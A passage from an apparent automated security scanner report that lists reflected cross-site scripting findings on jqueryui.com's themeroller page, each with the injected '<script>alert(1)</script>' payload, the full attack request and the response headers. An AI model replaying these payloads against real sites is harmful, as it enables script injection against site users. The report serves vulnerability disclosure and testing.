efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:28:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94f"><script>alert(1)</script>389a59d3bbf was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:28:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120002
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cee7"><script>alert(1)</script>abd743a9c48 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e87"><script>alert(1)</script>a3ea86a304c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc50e"><script>alert(1)</script>3faf1eb1fc7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46104"><script>alert(1)</script>3928c085e5 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8814c"><script>alert(1)</script>b9661bee4fa was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef9c"><script>alert(1)</script>ed8429324bf was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd783"><script>alert(1)</script>5297cb49336 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
2.173. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e9c"><script>alert(1)</script>97c25945815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?58e9c"><script>alert(1)</script>97c25945815=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:27:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b20"><script>alert(1)</script>b5290387e91 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb683"><script>alert(1)</script>eb19ef13760 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1a"><script>alert(1)</script>f81de3072b1 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d810"><script>alert(1)</script>4269b9b1148 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13436"><script>alert(1)</script>8ee759e7141 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
